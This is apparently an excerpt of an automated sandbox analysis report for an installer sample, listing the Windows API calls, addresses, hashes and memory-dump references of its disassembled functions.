                                                                                                                                                                            • API ID: IndirectMessage
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1874166685-0
                                                                                                                                                                            • Opcode ID: e599ad68c8be2b87716b93389efebd5836f5a776e8aa86078d111b59df2cb3f7
                                                                                                                                                                            • Instruction ID: 054c65bb711e663e566a4fe45ca9fd0f36251d7a25d2d2c6c9ec5f98a3fa3aea
                                                                                                                                                                            • Opcode Fuzzy Hash: e599ad68c8be2b87716b93389efebd5836f5a776e8aa86078d111b59df2cb3f7
                                                                                                                                                                            • Instruction Fuzzy Hash: 3EF0F8316103048BC754CF58EAA872637E0E745700F10813FE881A23F0E7B84491CF4E
                                                                                                                                                                            APIs
                                                                                                                                                                            • RegOpenKeyExW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,0040659D,?,?,?,?,Remove folder: ,?,00000000), ref: 00406533
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Open
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 71445658-0
                                                                                                                                                                            • Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                                                                                                                                            • Instruction ID: f918e5a98cb24a054262289ed7dc727aaea68e18f53d3a7cb50250e03803467c
                                                                                                                                                                            • Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                                                                                                                                            • Instruction Fuzzy Hash: 49D0127200020DBBDF119E90AD01FAB3B1DEB08750F014826FE06A4090D775D530A759
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetDlgItemTextW.USER32(?,?,00000000), ref: 0040463B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ItemText
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3367045223-0
                                                                                                                                                                            • Opcode ID: 9f5f9317995870dd68fcf34551989b3f9c33a874f6e62bdf9e4bbf2fb329bfe5
                                                                                                                                                                            • Instruction ID: 40b0c8aab23b9b46c3ec191ca1ef6f3d1e6ea20de3ce9ad326d3c9787e78ebc3
                                                                                                                                                                            • Opcode Fuzzy Hash: 9f5f9317995870dd68fcf34551989b3f9c33a874f6e62bdf9e4bbf2fb329bfe5
                                                                                                                                                                            • Instruction Fuzzy Hash: 36C04C75548300BFE641A759CC42F1FB799EF94355F40C92EB15DA11D1C67588209A2A
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040467F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                            • Opcode ID: 6e1b277ce2e60e4bca7100d33b085465e2d15658cc9e03b99e7eec8e5e984b4d
                                                                                                                                                                            • Instruction ID: af208d489c9886f4e313255891423178c9fbc2f2764a4643b28e90c636558d3c
                                                                                                                                                                            • Opcode Fuzzy Hash: 6e1b277ce2e60e4bca7100d33b085465e2d15658cc9e03b99e7eec8e5e984b4d
                                                                                                                                                                            • Instruction Fuzzy Hash: 56C04C716402007ADA119B509E49F0777A857D0750F154A79B641E50E0E7B5E450D61D
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageW.USER32(00000028,?,00000001,00404481), ref: 00404664
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                            • Opcode ID: f17b044b61b457f087bfeb3d17745763a09fbd5f12d8a34ac9dd27775b8272a2
                                                                                                                                                                            • Instruction ID: 10eff6f21afbf1ef2b68fd6575b90ea2c3c46436311cc0867b5bb07e65eb3fbf
                                                                                                                                                                            • Opcode Fuzzy Hash: f17b044b61b457f087bfeb3d17745763a09fbd5f12d8a34ac9dd27775b8272a2
                                                                                                                                                                            • Instruction Fuzzy Hash: A1B012356C4600BBDE115B40DE49F467F62E7A4B01F008579F380640F0CBF200E0DB19
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,0040331B,?), ref: 0040362B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FilePointer
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 973152223-0
                                                                                                                                                                            • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                                                                                                                            • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                                                                                                                                                            • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                                                                                                                            • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                                                                                                                                                            APIs
                                                                                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,0040441A), ref: 0040464D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CallbackDispatcherUser
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2492992576-0
                                                                                                                                                                            • Opcode ID: c073a5ec0840fd0a4d417e8cf15a40d0e4bc79272bf166bfe9221ef36532abb8
                                                                                                                                                                            • Instruction ID: f5342d9634f29a5dfc1e0db37023d9f0ac9e73469a68d8a9939ce4b2318c467f
                                                                                                                                                                            • Opcode Fuzzy Hash: c073a5ec0840fd0a4d417e8cf15a40d0e4bc79272bf166bfe9221ef36532abb8
                                                                                                                                                                            • Instruction Fuzzy Hash: 28A0017A484900ABCA06AB50EF1A80ABB62FBA5705B518879B285510348B725820FB19
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00405727: lstrlenW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
                                                                                                                                                                              • Part of subcall function 00405727: lstrlenW.KERNEL32(004030CD,Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
                                                                                                                                                                              • Part of subcall function 00405727: lstrcatW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\,004030CD,004030CD,Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\,00000000,00000000,00000000), ref: 00405782
                                                                                                                                                                              • Part of subcall function 00405727: SetWindowTextW.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\), ref: 00405794
                                                                                                                                                                              • Part of subcall function 00405727: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
                                                                                                                                                                              • Part of subcall function 00405727: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
                                                                                                                                                                              • Part of subcall function 00405727: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
                                                                                                                                                                              • Part of subcall function 00405C85: CreateProcessW.KERNEL32(00000000,00481000,00000000,00000000,00000000,04000000,00000000,00000000,0045A750,?,?,?,00481000,?), ref: 00405CAE
                                                                                                                                                                              • Part of subcall function 00405C85: CloseHandle.KERNEL32(?,?,?,00481000,?), ref: 00405CBB
                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00402010
                                                                                                                                                                              • Part of subcall function 00406B41: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406B52
                                                                                                                                                                              • Part of subcall function 00406B41: GetExitCodeProcess.KERNEL32(?,?), ref: 00406B74
                                                                                                                                                                              • Part of subcall function 004065E9: wsprintfW.USER32 ref: 004065F6
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2972824698-0
                                                                                                                                                                            • Opcode ID: 0ca44847665e9aed309d99185b61354d5aa0b5474cd0cc683bca3159d0948431
                                                                                                                                                                            • Instruction ID: 39264c5466c0a9c1499aa9251a9428ad8f628c8ba18ccf0a3388d06020594a91
                                                                                                                                                                            • Opcode Fuzzy Hash: 0ca44847665e9aed309d99185b61354d5aa0b5474cd0cc683bca3159d0948431
                                                                                                                                                                            • Instruction Fuzzy Hash: ABF0FC31904111DBEB20BBA55AC94AE7260CF00318F10413FE202B21D5CABC4D41A65E
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Sleep
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3472027048-0
                                                                                                                                                                            • Opcode ID: f18e2d7214b30d3dc46271dbcb4a7f92884385a6914c4136972039e1db28dba1
                                                                                                                                                                            • Instruction ID: 59c12c35bbb872f0caeb150da19be0ad997f967f675472e8316fb546946162d5
                                                                                                                                                                            • Opcode Fuzzy Hash: f18e2d7214b30d3dc46271dbcb4a7f92884385a6914c4136972039e1db28dba1
                                                                                                                                                                            • Instruction Fuzzy Hash: DAD05E73A146008BD744EBB8BE8546F73A8EA50319320483BD142E10A1E6B88901461C
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetDlgItem.USER32(?,000003F9), ref: 004050A6
                                                                                                                                                                            • GetDlgItem.USER32(?,00000408), ref: 004050B1
                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 004050FB
                                                                                                                                                                            • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00405112
                                                                                                                                                                            • SetWindowLongW.USER32(?,000000FC,0040569B), ref: 0040512B
                                                                                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 0040513F
                                                                                                                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405151
                                                                                                                                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00405167
                                                                                                                                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405173
                                                                                                                                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405185
                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00405188
                                                                                                                                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 004051B3
                                                                                                                                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 004051BF
                                                                                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040525A
                                                                                                                                                                            • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040528A
                                                                                                                                                                              • Part of subcall function 00404656: SendMessageW.USER32(00000028,?,00000001,00404481), ref: 00404664
                                                                                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040529E
                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 004052CC
                                                                                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004052DA
                                                                                                                                                                            • ShowWindow.USER32(?,00000005), ref: 004052EA
                                                                                                                                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 004053E5
                                                                                                                                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040544A
                                                                                                                                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040545F
                                                                                                                                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405483
                                                                                                                                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004054A3
                                                                                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 004054B8
                                                                                                                                                                            • GlobalFree.KERNEL32(?), ref: 004054C8
                                                                                                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405541
                                                                                                                                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 004055EA
                                                                                                                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004055F9
                                                                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00405624
                                                                                                                                                                            • ShowWindow.USER32(?,00000000), ref: 00405672
                                                                                                                                                                            • GetDlgItem.USER32(?,000003FE), ref: 0040567D
                                                                                                                                                                            • ShowWindow.USER32(00000000), ref: 00405684
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                            • String ID: $M$N
                                                                                                                                                                            • API String ID: 2564846305-813528018
                                                                                                                                                                            • Opcode ID: 34fa74ef7f2c8ae10774f757d898aea139b191b20b2690d18c4730151a5bece5
                                                                                                                                                                            • Instruction ID: 154044203e87ae86578454b6b14b757097bfc819611b9ce4677548c75e4aac0f
                                                                                                                                                                            • Opcode Fuzzy Hash: 34fa74ef7f2c8ae10774f757d898aea139b191b20b2690d18c4730151a5bece5
                                                                                                                                                                            • Instruction Fuzzy Hash: D8028D70900609AFDB20DFA5CD85AAF7BB5FB45314F10857AF910BA2E1D7B98A41CF18
                                                                                                                                                                            APIs
                                                                                                                                                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040487E
                                                                                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 00404892
                                                                                                                                                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004048AF
                                                                                                                                                                            • GetSysColor.USER32(?), ref: 004048C0
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004048CE
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004048DC
                                                                                                                                                                            • lstrlenW.KERNEL32(?), ref: 004048E1
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004048EE
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404903
                                                                                                                                                                            • GetDlgItem.USER32(?,0000040A), ref: 0040495C
                                                                                                                                                                            • SendMessageW.USER32(00000000), ref: 00404963
                                                                                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 0040498E
                                                                                                                                                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004049D1
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 004049DF
                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 004049E2
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 004049FB
                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 004049FE
                                                                                                                                                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404A2D
                                                                                                                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404A3F
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                                            • String ID: N$Remove folder: $WG@
                                                                                                                                                                            • API String ID: 3103080414-2486083310
                                                                                                                                                                            • Opcode ID: b01416c62338905acfc632b3e745d4ba8895ca3ce3da3a804f9e2edfaf49b693
                                                                                                                                                                            • Instruction ID: 519c373e7f185e7fda66e670232f02753279bd673d39c82729c50cf19e81ba39
                                                                                                                                                                            • Opcode Fuzzy Hash: b01416c62338905acfc632b3e745d4ba8895ca3ce3da3a804f9e2edfaf49b693
                                                                                                                                                                            • Instruction Fuzzy Hash: 6461B3B1A40209BFDF10AF60CD85A6A7B79FB84304F00843AFA15B62D0D779A951CF99
                                                                                                                                                                            APIs
                                                                                                                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                            • DrawTextW.USER32(00000000,00464260,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                            Strings
